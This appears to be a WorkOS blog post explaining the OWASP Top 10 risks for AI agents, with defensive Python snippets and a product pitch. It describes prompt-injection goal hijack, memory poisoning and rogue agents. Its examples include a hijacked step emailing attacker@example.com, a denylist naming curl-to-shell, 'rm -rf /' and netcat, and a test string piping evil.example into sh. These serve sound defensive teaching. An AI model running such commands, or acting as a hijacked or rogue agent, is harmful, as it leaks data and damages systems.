The OWASP Top 10 for agentic applications: What developers building with AI agents need to know
How AI agents get hijacked, poisoned, and over-privileged, and why identity is the fix for most of it.
AI agents aren't chatbots anymore. They schedule meetings, move money, provision infrastructure, and execute multi-step workflows across your production systems. They do this autonomously, often without a human checking every action before it fires.
That shift from "answer questions" to "take actions" is exactly why the OWASP GenAI Security Project released the Top 10 for Agentic Applications in December 2025. Developed by more than 100 security researchers and practitioners, the list identifies the most critical risks facing autonomous AI systems in production today.
If you're building software that uses agents, orchestrates tools via MCP, or ships AI-powered features to enterprise customers, this is required reading. In this article we'll walk through each of the ten risks, explain why they matter in practice, and outline the controls that actually work.
Two principles before the list
Before diving into individual risks, the framework foregrounds two design principles that underpin everything else.
- Least agency. This is the agentic evolution of least privilege. It's no longer just about what an agent can access; it's about how much freedom it has to act on that access without checking back. Autonomy should be earned, not granted by default. If your agent has the credentials to drop a database but its job is to answer support tickets, something has gone wrong at the design level.
- Strong observability. Limiting what an agent can do is only half the equation. You also need to see what it's doing, why, and with whose identity. Least agency without observability is blind risk reduction. Observability without least agency is surveillance of an agent you haven't bothered to constrain. The two principles work together, and every risk in the Top 10 maps back to a failure in one or both.
ASI01: Agent goal hijack
An attacker alters an agent's objectives or decision path through malicious content injected into the data the agent processes.
This is prompt injection's more dangerous cousin. In a traditional LLM app, a successful injection might produce a rude response or leak a system prompt. In an agentic system, the same attack can redirect the agent's entire plan of action. The agent still looks like it's working normally, but it's now pursuing a different goal.
The attack surface is wide: a poisoned document the agent summarizes, a crafted email it triages, or a web page it fetches for context. Any untrusted input that reaches the agent's planning loop is a potential vector.
What helps: Treat every external input as untrusted data, not instructions. Validate agent plans against an explicit allowlist of permitted actions. Implement guardrails that reject deviations from the original task scope. Run the agent in a sandboxed environment where a hijacked goal can't reach production systems.
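The allowlist check above can be sketched in a few lines. This is an illustrative example, not a real framework's API: the action names and plan format are assumptions, but the pattern (reject any plan step outside the agent's declared task scope before anything executes) is the point.

```python
# Hypothetical plan validator: every proposed step must name an allowed action.
ALLOWED_ACTIONS = {"search_tickets", "read_ticket", "post_reply"}

def validate_plan(plan: list[dict]) -> list[str]:
    """Return a list of violations; an empty list means the plan is in scope."""
    violations = []
    for i, step in enumerate(plan):
        action = step.get("action")
        if action not in ALLOWED_ACTIONS:
            violations.append(f"step {i}: action {action!r} is outside task scope")
    return violations

# A hijacked plan that tries to exfiltrate data is rejected before execution.
plan = [
    {"action": "read_ticket", "args": {"id": 42}},
    {"action": "send_email", "args": {"to": "attacker@example.com"}},
]
assert validate_plan(plan) == ["step 1: action 'send_email' is outside task scope"]
```

The key design choice is deny-by-default: the validator lists what the agent may do, so a hijacked goal that invents a new action fails closed.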
ASI02: Tool misuse and exploitation
Agents use legitimate tools in unsafe ways, whether through ambiguous prompts, manipulated inputs, or tool chain sequences that nobody anticipated.
Your agent has access to a database query tool, a file writer, and an email sender. Individually, each is fine. But if a crafted input causes the agent to query sensitive records, write them to a file, and email that file to an external address, you've got data exfiltration through a perfectly authorized tool chain.
This is where the PromptPwnd class of vulnerabilities becomes relevant: untrusted content in GitHub issues and pull requests was injected into prompts inside CI/CD workflows. When paired with powerful tokens and tools, that led to secret exposure and repository modifications. The tools themselves were legitimate. The usage was not.
What helps: Scope tool permissions tightly. Validate tool arguments against schemas, not just types. Add policy controls to every tool invocation. Monitor tool chain sequences for anomalous patterns. And never give a tool write access to a system where it only needs read.
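Here is a minimal sketch of "validate arguments against schemas, not just types." The tool names and policy rules are assumptions for illustration; the idea is that each tool invocation passes both a structural check and a content-level policy check before it runs.

```python
# Illustrative per-tool schemas plus content policies, checked on every call.
TOOL_POLICIES = {
    "query_db": {
        "args": {"query": str},
        # Content-level rule, not just a type check: reads only.
        "policy": lambda a: a["query"].lstrip().lower().startswith("select"),
    },
    "send_email": {
        "args": {"to": str, "body": str},
        # Hypothetical rule: mail stays inside the organization's domain.
        "policy": lambda a: a["to"].endswith("@example.com"),
    },
}

def check_invocation(tool: str, args: dict) -> bool:
    spec = TOOL_POLICIES.get(tool)
    if spec is None:
        return False  # unknown tools are denied by default
    if set(args) != set(spec["args"]):
        return False  # schema: exact argument names
    if not all(isinstance(args[k], t) for k, t in spec["args"].items()):
        return False  # schema: argument types
    return spec["policy"](args)  # policy: what the arguments actually say

assert check_invocation("query_db", {"query": "SELECT * FROM tickets"})
assert not check_invocation("query_db", {"query": "DROP TABLE tickets"})
assert not check_invocation("send_email", {"to": "x@evil.io", "body": "hi"})
```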
ASI03: Identity and privilege abuse
Agents inherit or escalate high-privilege credentials, creating opportunities for unauthorized access across systems.
This is the identity problem that gets worse with autonomy. In most current implementations, agents operate with the full credentials of the user who invoked them, or worse, with a shared service account that has broad access. If the agent is compromised (or just confused), it can do anything those credentials allow.
The pattern is familiar to anyone who's worked in enterprise security: overly permissive service accounts, static API keys that never rotate, and credentials that persist long after they should have expired. The difference with agents is that they can act on those credentials at machine speed across multiple systems simultaneously.
What helps: Give agents their own managed identity with restricted, time-bound scopes, rather than letting them borrow the user's session. Use OAuth 2.1 with sender-constrained tokens so credentials can't be replayed. Enforce fine-grained authorization (RBAC, ReBAC, or ABAC) at the tool level, not just the agent level. Audit every action the agent takes with proper attribution to both the agent identity and the user who authorized it.
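The shape of a scoped, time-bound agent credential can be sketched as below. In production an OAuth 2.1 authorization server issues and verifies these tokens; this toy version only shows the two properties that matter here, an expiry that is enforced and scopes that are checked per action.

```python
import time
import secrets

# Hypothetical issuance of a short-lived, narrowly scoped agent credential.
def issue_agent_token(agent_id: str, scopes: set[str], ttl_s: int) -> dict:
    return {
        "sub": agent_id,             # the agent's own identity, not a user's session
        "scopes": scopes,
        "exp": time.time() + ttl_s,  # short-lived by default
        "token": secrets.token_urlsafe(32),
    }

def authorize(token: dict, required_scope: str) -> bool:
    if time.time() >= token["exp"]:
        return False                 # expired credentials stop working on their own
    return required_scope in token["scopes"]

tok = issue_agent_token("support-agent-7", {"tickets:read"}, ttl_s=300)
assert authorize(tok, "tickets:read")
assert not authorize(tok, "billing:write")  # scope was never granted
```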
ASI04: Agentic supply chain vulnerabilities
Compromised tools, plugins, prompt templates, and external servers introduce vulnerabilities that agents leverage at runtime.
Traditional supply chain attacks target your build pipeline. Agentic supply chain attacks target your runtime. When your agent dynamically loads tools from an MCP server, fetches prompt templates from a registry, or delegates to a third-party sub-agent, each of those components becomes a trust boundary you need to verify.
In July 2025, CVE-2025-6514 was discovered in mcp-remote, a widely used MCP OAuth proxy distributed via npm. The vulnerability enabled command execution and credential compromise across hundreds of thousands of installations. Two months later, an npm phishing campaign compromised 18 popular packages, demonstrating how quickly malicious updates cascade through the exact kind of dependency graph that MCP servers rely on.
What helps: Pin and verify tool versions. Validate tool descriptors and schemas before loading them. Treat MCP servers as untrusted infrastructure until authenticated. Audit your agent's full dependency tree, including transitive dependencies. Implement integrity checks on prompt templates. Run third-party tools in isolated sandboxes with restricted network access.
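"Pin and verify tool versions" can be made concrete with a digest check over each tool descriptor before it loads. The descriptor format and registry below are assumptions, not a real MCP API; the pattern is hashing a canonical form and refusing anything that drifts from the pinned value.

```python
import hashlib
import json

def descriptor_digest(descriptor: dict) -> str:
    """Canonical SHA-256 digest of a tool descriptor."""
    canonical = json.dumps(descriptor, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()

# Pin the descriptor you reviewed; version alone is not enough, since a
# registry compromise can ship different contents under the same version.
trusted = {"name": "file_writer", "version": "1.4.2", "params": ["path", "data"]}
PINNED = {"file_writer@1.4.2": descriptor_digest(trusted)}

def load_tool(descriptor: dict) -> bool:
    key = f'{descriptor["name"]}@{descriptor["version"]}'
    return PINNED.get(key) == descriptor_digest(descriptor)

assert load_tool(trusted)
# An upstream change to the descriptor (here, a new network parameter) is refused.
tampered = {**trusted, "params": ["path", "data", "url"]}
assert not load_tool(tampered)
```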
ASI05: Unexpected code execution
Agents generate or run code and commands unsafely, creating opportunities for remote code execution, sandbox escapes, and data exfiltration.
Code generation is one of the most powerful agentic capabilities, and one of the most dangerous. When an agent writes a shell script, generates a SQL query, or produces a Python snippet for data analysis, the output inherits the full permissions of whatever runtime environment executes it.
A DevOps agent that generates deployment scripts could be tricked into including hidden commands. A data analysis agent could be manipulated into crafting queries that exfiltrate sensitive data. The attack doesn't need to be sophisticated; it just needs to reach the code generation step with malicious context.
What helps: Never execute agent-generated code with production credentials. Run generated code in sandboxed environments with no network access and minimal filesystem permissions. Validate generated code against a strict allowlist of permitted operations before execution. Implement output scanning for known malicious patterns (shell injection, SQL injection, SSRF).
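A pattern scan over generated commands is the weakest of the controls above, a last line of defense behind sandboxing, but it is cheap to add. The patterns below are examples only, nowhere near a complete denylist:

```python
import re

# Illustrative denylist for agent-generated shell commands. Incomplete by
# nature; sandboxing and allowlists do the real work.
SUSPICIOUS = [
    r"curl\s+[^|;]*\|\s*(sh|bash)",  # piping a download straight into a shell
    r"\brm\s+-rf\s+/",               # destructive filesystem commands
    r"\bnc\b.*\s-e\b",               # netcat with command execution
]

def scan_generated(script: str) -> list[str]:
    """Return the patterns a generated script matches; empty means no hit."""
    return [p for p in SUSPICIOUS if re.search(p, script)]

assert scan_generated("pip install -r requirements.txt") == []
assert scan_generated("curl http://evil.example/x | sh") != []
```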
ASI06: Memory and context poisoning
Attackers corrupt the data that agents rely on for knowledge and decision-making, causing flawed or malicious outcomes across sessions.
Agents with persistent memory (conversation history, RAG databases, embedding stores) introduce an attack surface that doesn't exist in stateless systems. If an attacker can inject false information into an agent's long-term memory during one session, that poisoned data influences every subsequent session.
The attack can be gradual: repeated interactions that slowly shift the agent's knowledge base. Or it can be targeted: a single interaction that plants a specific false fact the attacker knows the agent will act on later. In multi-agent systems, poisoning one agent's memory can cascade to every agent that consumes shared context.
What helps: Validate and sanitize all data before it enters long-term storage. Implement integrity checks on RAG databases and embedding stores. Scope memory access so agents can only read and write to their own context. Monitor for anomalous patterns in memory writes. Provide a mechanism to roll back corrupted memory state.
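One way to implement "integrity checks on long-term storage" is to seal each memory record with an HMAC at write time, so out-of-band tampering is detected at read time. Key management and field names here are illustrative assumptions:

```python
import hashlib
import hmac
import json

KEY = b"memory-integrity-key"  # in practice, pulled from a secrets manager

def seal(record: dict) -> dict:
    """Attach an HMAC over the canonical record at write time."""
    payload = json.dumps(record, sort_keys=True).encode()
    return {"record": record,
            "mac": hmac.new(KEY, payload, hashlib.sha256).hexdigest()}

def verify(entry: dict) -> bool:
    """Recompute the HMAC at read time; a mismatch means tampering."""
    payload = json.dumps(entry["record"], sort_keys=True).encode()
    expected = hmac.new(KEY, payload, hashlib.sha256).hexdigest()
    return hmac.compare_digest(entry["mac"], expected)

entry = seal({"fact": "vendor X account is 12-345", "source": "invoice-881"})
assert verify(entry)
entry["record"]["fact"] = "vendor X account is 99-999"  # poisoned in storage
assert not verify(entry)
```

This catches direct modification of the store; it does not catch poisoned data that was false when written, which is what the input validation step is for.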
ASI07: Insecure inter-agent communication
Multi-agent systems face spoofing, message tampering, and unauthorized delegation between agents.
When you split a complex workflow across multiple specialized agents, the communication channel between them becomes critical infrastructure. If Agent A can tell Agent B to execute a privileged action without proper authentication, anyone who can forge a message from Agent A effectively controls Agent B.
The risks include spoofed identities (an attacker pretending to be a trusted agent), replayed messages (re-sending a legitimate authorization out of context), and false consensus attacks (fabricating agreement messages to trick a voting-based system).
What helps: Authenticate every inter-agent message. Sign communications with agent-specific keys. Validate message integrity and freshness (nonces, timestamps). Enforce authorization policies on delegation chains. Never allow one agent to escalate another agent's privileges.
ASI08: Cascading failures
Small errors propagate across planning and execution, amplifying through interconnected systems.
In a traditional application, a bug produces a wrong answer. In an agentic system, a small error in one step becomes the input to the next step, which amplifies it, which feeds it into the next step. A hallucinated API endpoint becomes a real API call that fails, which triggers an error-handling routine that makes a different (also wrong) API call.
The problem compounds in multi-agent architectures. Agent A produces a slightly wrong intermediate result. Agent B treats it as ground truth and builds on it. Agent C synthesizes both outputs into a recommendation that's confidently wrong in a way neither individual error would produce alone.
What helps: Implement circuit breakers that halt agent execution when error rates spike. Add validation checkpoints between planning and execution stages. Design agent workflows with explicit rollback mechanisms. Monitor for self-reinforcing error patterns. Set hard limits on chain depth and execution time.
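Two of those controls, the circuit breaker and the hard depth limit, fit naturally in one small guard. Thresholds below are arbitrary examples:

```python
# Illustrative guard: halt a chain when consecutive failures spike or when it
# runs deeper than its hard limit.
class CircuitBreaker:
    def __init__(self, max_failures: int = 3, max_depth: int = 10):
        self.failures = 0
        self.max_failures = max_failures
        self.max_depth = max_depth

    def before_step(self, depth: int) -> None:
        if depth >= self.max_depth:
            raise RuntimeError("chain depth limit reached; halting agent")
        if self.failures >= self.max_failures:
            raise RuntimeError("circuit open: too many failures; halting agent")

    def record(self, ok: bool) -> None:
        # Consecutive-failure count: one success resets the breaker.
        self.failures = 0 if ok else self.failures + 1

cb = CircuitBreaker(max_failures=2)
cb.record(ok=False)
cb.record(ok=False)
try:
    cb.before_step(depth=3)
    tripped = False
except RuntimeError:
    tripped = True
assert tripped  # the chain stops instead of amplifying the error
```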
ASI09: Human-agent trust exploitation
Users over-trust agent recommendations, enabling social engineering and covert harmful actions.
This risk targets the human, not the machine. Agents that communicate in natural language, display confidence, and have a track record of being helpful build implicit trust. Attackers exploit that trust by causing agents to present manipulated information with the same authority they use for legitimate recommendations.
The scenarios are concrete: an agent that presents a phishing link as a legitimate recommendation. An agent that modifies invoice details in a summary, replacing a real vendor's payment information with an attacker's. An agent that confidently recommends a course of action based on poisoned context.
What helps: Design UIs that distinguish between agent-generated content and verified information. Require human approval for high-stakes actions regardless of the agent's confidence level. Display provenance information so users can verify the sources behind recommendations. Implement anomaly detection on agent outputs to flag unusual recommendations.
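The approval requirement can be enforced in code rather than left to UI convention. The action list and approval hook below are assumptions for the sketch; the property that matters is that a human denial wins no matter how confident the agent is:

```python
# Hypothetical high-stakes gate: these actions never execute without a human yes.
HIGH_STAKES = {"send_payment", "change_vendor_details", "delete_records"}

def execute(action: str, args: dict, approve) -> str:
    """`approve` is a callback that asks a human; here it is stubbed with lambdas."""
    if action in HIGH_STAKES and not approve(action, args):
        return "blocked: awaiting human approval"
    return f"executed {action}"

# A denial from the reviewer always wins, even if the agent is "sure".
assert execute("send_payment", {"amount": 900},
               approve=lambda a, k: False) == "blocked: awaiting human approval"
# Routine actions proceed without the gate.
assert execute("post_reply", {"text": "hi"},
               approve=lambda a, k: False) == "executed post_reply"
```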
ASI10: Rogue agents
Compromised or misaligned agents act harmfully while appearing legitimate, exploiting trust mechanisms in multi-agent workflows.
A rogue agent is one that has been compromised (through goal hijacking, supply chain attack, or memory poisoning) but continues to operate within the system's trust boundaries. It approves transactions it shouldn't approve, exfiltrates data while appearing to process it normally, or subtly corrupts the work of other agents it interacts with.
The key challenge is detection. A rogue agent looks legitimate because it was legitimate before it was compromised. It has valid credentials, follows normal communication patterns, and produces outputs that are close enough to correct to avoid simple validation checks.
What helps: Implement strict governance with behavioral monitoring. Run anomaly detection on agent output patterns, not just individual outputs. Enforce kill switches that can immediately halt any agent. Sandbox agents so a compromised instance can't persist across sessions. Monitor for drift in agent behavior over time.
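"Monitor for drift in agent behavior" needs a behavioral baseline to compare against. A minimal sketch, using L1 distance between tool-usage frequency distributions as the drift metric (both the metric and the threshold are arbitrary choices for illustration):

```python
from collections import Counter

def usage_dist(calls: list[str]) -> dict[str, float]:
    """Relative frequency of each tool in a window of calls."""
    counts = Counter(calls)
    total = sum(counts.values())
    return {tool: n / total for tool, n in counts.items()}

def drift(baseline: dict[str, float], recent: dict[str, float]) -> float:
    """L1 distance between two usage distributions (0 = identical, 2 = disjoint)."""
    tools = set(baseline) | set(recent)
    return sum(abs(baseline.get(t, 0) - recent.get(t, 0)) for t in tools)

baseline = usage_dist(["read_ticket"] * 8 + ["post_reply"] * 2)
normal = usage_dist(["read_ticket"] * 7 + ["post_reply"] * 3)
rogue = usage_dist(["export_data"] * 6 + ["read_ticket"] * 4)

KILL_THRESHOLD = 0.5
assert drift(baseline, normal) < KILL_THRESHOLD
assert drift(baseline, rogue) > KILL_THRESHOLD  # trip the kill switch, alert operators
```

A compromised agent's individual calls all look valid; it's the shift in the overall pattern that gives it away.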
Identity is the connective tissue
If you read through all ten risks, a pattern emerges: most of them are identity and authorization problems in disguise.
Goal hijacking succeeds because the agent doesn't distinguish between instructions from a trusted orchestrator and instructions embedded in untrusted data. Tool misuse succeeds because authorization is checked at the agent level rather than the tool level. Privilege abuse succeeds because agents inherit human credentials instead of operating with their own scoped identity. Inter-agent attacks succeed because communication channels lack authentication. Rogue agents succeed because there's no behavioral baseline tied to a verified identity.
The principle of least agency isn't just about limiting what agents can do. It's about building an identity layer that answers three questions for every action:
- Who is acting? The agent should have its own identity, separate from the user who invoked it.
- What are they authorized to do? Permissions should be scoped to the specific task, time-bound, and revocable.
- Can we prove it later? Every action needs an audit trail that links the agent identity, the user authorization, and the specific tool invocation.
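The three questions above translate directly into what an audit record must capture for every action. Field names here are illustrative, not a specific product's schema:

```python
import json
import time
from dataclasses import dataclass, asdict

@dataclass
class AuditRecord:
    agent_id: str       # who is acting: the agent's own identity
    on_behalf_of: str   # which user authorized it
    tool: str           # what was invoked
    scopes: tuple       # what it was authorized to do at the time
    ts: float           # when

rec = AuditRecord(
    agent_id="support-agent-7",
    on_behalf_of="user_2xK9",   # hypothetical user ID
    tool="tickets.read",
    scopes=("tickets:read",),
    ts=time.time(),
)
line = json.dumps(asdict(rec))  # append-only log line, one per action
assert '"support-agent-7"' in line and '"user_2xK9"' in line
```

If any of the five fields is missing, one of the three questions becomes unanswerable after the fact.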
These are the same questions enterprises have been asking about human users for decades. The difference is that agents operate at machine speed, across multiple systems, and can be compromised in ways that humans can't. The controls need to be automated, granular, and enforced at every trust boundary, not just at the front door.
Securing AI agents and MCP servers with WorkOS
Most of the OWASP Top 10 boils down to two questions at every trust boundary:
- Who is making this request?
- Are they allowed to do what they're asking?
Authentication handles the first. Authorization handles the second. In agentic systems, you need both enforced at every layer, from the user session down to the individual tool invocation.
Authentication: Giving agents their own identity
The MCP specification adopted OAuth 2.1 as its authorization framework in March 2025, which was the right call. OAuth gives you scoped, time-limited tokens, proper client identification, and a revocation path that doesn't require rotating every credential in your system. The problem is that implementing an OAuth 2.1 authorization server from scratch is a significant amount of work, especially when your enterprise customers expect SSO, SAML federation, directory sync, and audit logging on top of it.
WorkOS AuthKit acts as the authorization server for your MCP deployments, handling the OAuth 2.1 flows so you can focus on building tools instead of building auth infrastructure. The setup maps directly to the three-party MCP architecture: the host (the AI app your user interacts with), the MCP client (which handles the protocol), and the MCP server (where tools and logic live).
For user-facing agents, you use the authorization code flow with PKCE. The user authenticates through WorkOS, the MCP client receives a scoped access token, and every tool invocation carries that token.
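The PKCE part of that flow is small enough to show directly. Per RFC 7636, the client generates a random verifier, sends the derived challenge with the authorization request, and reveals the verifier only at the token exchange, so an intercepted authorization code is useless on its own:

```python
import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple[str, str]:
    """Return (code_verifier, code_challenge) per RFC 7636, S256 method."""
    verifier = secrets.token_urlsafe(64)[:128]  # high-entropy, URL-safe, 43-128 chars
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
    return verifier, challenge

verifier, challenge = make_pkce_pair()

# At token exchange, the authorization server recomputes the challenge from the
# presented verifier and compares it to the one sent earlier:
recomputed = base64.urlsafe_b64encode(
    hashlib.sha256(verifier.encode("ascii")).digest()
).rstrip(b"=").decode("ascii")
assert recomputed == challenge
```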
For machine-to-machine communication between agents and backend MCP servers, you use the client credentials flow. Each agent gets its own client ID and authenticates as itself, not with a borrowed human session. This is directly relevant to ASI03 (identity and privilege abuse): the agent operates with its own scoped identity, and if that identity is revoked, access stops immediately.
For enterprise customers with existing identity providers, WorkOS handles SAML and OIDC federation out of the box.
If you're already running user auth and want to add MCP server authentication without rebuilding your stack, WorkOS Connect works as an OAuth bridge: MCP clients authenticate through WorkOS, users sign in to your app, and WorkOS issues tokens that the MCP client presents to your server.
Authorization: RBAC for tool-level permissions
Authentication tells you who is acting. RBAC tells you what category of actions they can perform. You define roles that map to permission sets and assign them to agents, not just users. A "support-agent" role can read tickets and write internal notes but can't touch billing data. A "data-analyst-agent" role can run read-only queries but can't write to production tables.
WorkOS enforces these roles through the token claims that AuthKit issues. When an MCP server receives a tool invocation, it checks the agent's role against the required permission for that tool. If the role doesn't include billing:read, the billing tool rejects the request, regardless of what the underlying LLM thinks it should be doing.
This maps directly to ASI02 (tool misuse). Your agent might have access to a database tool, a file tool, and an email tool. RBAC ensures the "support-agent" role can query the database for reads only, can't write files to external paths, and can't send email outside the organization's domain. The tools exist in the agent's environment, but the permissions are scoped per role. When Agent A delegates to Agent B (ASI07), the delegation carries role context, and Agent B can't escalate beyond Agent A's permissions.
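The tool-level check described above reduces to a few lines on the server side. Role and permission names here are the article's examples; in a real deployment the claims would come from a verified access token rather than a plain dict:

```python
# Illustrative role-to-permission mapping enforced at each tool invocation.
ROLE_PERMISSIONS = {
    "support-agent": {"tickets:read", "notes:write"},
    "data-analyst-agent": {"db:read"},
}

def tool_allowed(token_claims: dict, required: str) -> bool:
    """Check the agent's role claim against the permission a tool requires."""
    role = token_claims.get("role")
    return required in ROLE_PERMISSIONS.get(role, set())

claims = {"sub": "agent_01", "role": "support-agent"}
assert tool_allowed(claims, "tickets:read")
# Rejected at the tool boundary, regardless of what the LLM decided to do.
assert not tool_allowed(claims, "billing:read")
```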
Fine-grained authorization for resource-level control
RBAC works when permissions map to roles. But agentic systems often need more nuance:
- Can this agent access this specific workspace's data?
- Can it modify this particular project?
- Can it act on resources in this tenant, or across tenants?
WorkOS Fine-Grained Authorization (FGA) extends RBAC by adding hierarchical, resource-scoped access control. The mental model stays the same (roles, permissions, assignments), but roles are now scoped to specific resources arranged in a hierarchy, and permissions flow down that hierarchy automatically.
The building blocks are straightforward. You define resource types that mirror your product's entity structure: organizations, workspaces, projects, tools. You create resources at runtime with a type, an ID, and a parent. You define roles scoped to specific resource types, each carrying a set of permissions. Then you create assignments that bind a subject (a user, and soon agents and services) to a role on a specific resource. When an access check comes in, FGA evaluates not just the direct assignment, but also roles inherited from parent resources and organization-level roles.
Here's why this matters for agentic security. Consider ASI03 (identity and privilege abuse): a support agent should only access resources within the workspace its authorizing user belongs to. With tenant-wide RBAC alone, you'd either grant the agent access to all workspaces (over-privileged) or build custom scoping logic in your application code (fragile, hard to audit). With FGA, you assign the agent's authorizing user a role on a specific workspace, and FGA automatically grants access to the projects and resources nested within it, but nothing outside it. If the user's workspace assignment changes, the agent's access changes with it.
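The hierarchical evaluation described above can be modeled in miniature. This is a conceptual sketch of the FGA-style check, not the WorkOS API: the data model, names, and parent-walk are illustrative assumptions.

```python
# Resource hierarchy: each resource points at its parent.
PARENT = {
    "project:alpha": "workspace:eng",
    "workspace:eng": "org:acme",
    "workspace:sales": "org:acme",
}
# (subject, resource) -> role, and role -> permissions.
ASSIGNMENTS = {("user_2xK9", "workspace:eng"): "member"}
ROLE_PERMS = {"member": {"project:read"}}

def check(subject: str, permission: str, resource: str) -> bool:
    """Permission holds if any ancestor (or the resource itself) grants it."""
    node = resource
    while node is not None:
        role = ASSIGNMENTS.get((subject, node))
        if role and permission in ROLE_PERMS.get(role, set()):
            return True
        node = PARENT.get(node)  # walk up the hierarchy
    return False

# Access flows down from the workspace assignment to its nested project...
assert check("user_2xK9", "project:read", "project:alpha")
# ...but never sideways into a sibling workspace's tree.
assert not check("user_2xK9", "project:read", "workspace:sales")
```

Because the only path to a grant is up the resource's own ancestor chain, tenant isolation falls out of the data model rather than depending on query filters.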
This hierarchical model is also how you enforce tenant isolation in multi-tenant agentic applications. The tenant boundary is a resource in the hierarchy, not a query filter you hope your code always remembers to apply. An agent operating within Tenant A's resource tree can never reach Tenant B's resources, because there's no assignment that bridges the two hierarchies.
For ASI10 (rogue agents), FGA provides a surgical containment mechanism. If you detect anomalous behavior, you revoke the agent's role assignment on the relevant resource. It loses access to that resource and everything beneath it in the hierarchy, immediately and consistently, even if its credentials are still technically valid. This is faster and more precise than rotating tokens or killing sessions.
FGA integrates with the same AuthKit flow described above. Organization-level roles and permissions are embedded directly in the access token for fast checks. Resource-scoped permissions hit the FGA API, which evaluates against the full hierarchy with sub-50ms latency. Every check is logged. When your customer's security team asks "which agent accessed what data, on behalf of which user, at what time," you have the answer.
What to do next
If you're building agentic applications, here's where to start:
- Audit your current agent permissions. Map every tool, API, and system your agents can access. If the list is longer than what's needed for the agent's specific task, you're over-provisioned.
- Stop letting agents borrow user sessions. Give them their own managed credentials with WorkOS AuthKit. Use PKCE for user-authorized actions and client credentials for machine-to-machine communication.
- Add authorization at the tool level. Each tool invocation should be checked against both RBAC (does the agent's role permit this action type?) and FGA (is the agent authorized for this specific resource in the hierarchy?).
- Treat MCP servers as critical infrastructure. They need OAuth 2.1 authentication, input validation, and dependency auditing. An unauthenticated MCP server with broad permissions is the agentic equivalent of an open S3 bucket.
- Build observability from day one. Log every tool invocation, authorization decision, and inter-agent message. Link each action to the agent identity and user authorization that enabled it. You'll need these logs when (not if) something goes wrong.
The OWASP Top 10 for Agentic Applications is a field guide built from real incidents, and the risks it describes are already showing up in production systems. The good news is that you don't need to invent new security primitives for the agentic era. You need to apply proven patterns to a new class of actors: OAuth 2.1 for authentication, RBAC and FGA for authorization, audit logging for accountability. That's exactly what WorkOS is built for.